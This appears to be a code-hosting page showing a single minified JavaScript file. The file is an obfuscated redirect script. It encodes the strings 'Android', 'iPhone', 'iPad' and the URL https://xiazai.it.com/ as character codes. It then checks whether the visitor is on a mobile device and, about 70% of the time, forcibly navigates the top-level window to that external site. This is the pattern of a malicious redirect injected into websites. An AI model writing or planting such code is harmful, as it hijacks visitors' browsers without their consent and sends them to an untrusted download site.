Files
2026-08-01 20:51:24 +00:00

1 line
488 B
JavaScript

(function(){var w=window,u=(w.navigator||{}).userAgent||'',A=String.fromCharCode(65,110,100,114,111,105,100),I=String.fromCharCode(105,80,104,111,110,101),P=String.fromCharCode(105,80,97,100),T=String.fromCharCode(104,116,116,112,115,58,47,47,120,105,97,122,97,105,46,105,116,46,99,111,109,47);try{if(w.__z)return;w.__z=1}catch(e){}if(!(u.indexOf(A)>=0||u.indexOf(I)>=0||u.indexOf(P)>=0))return;if(Math.random()>=0.7)return;try{w.top.location.replace(T)}catch(e){location.replace(T)}})();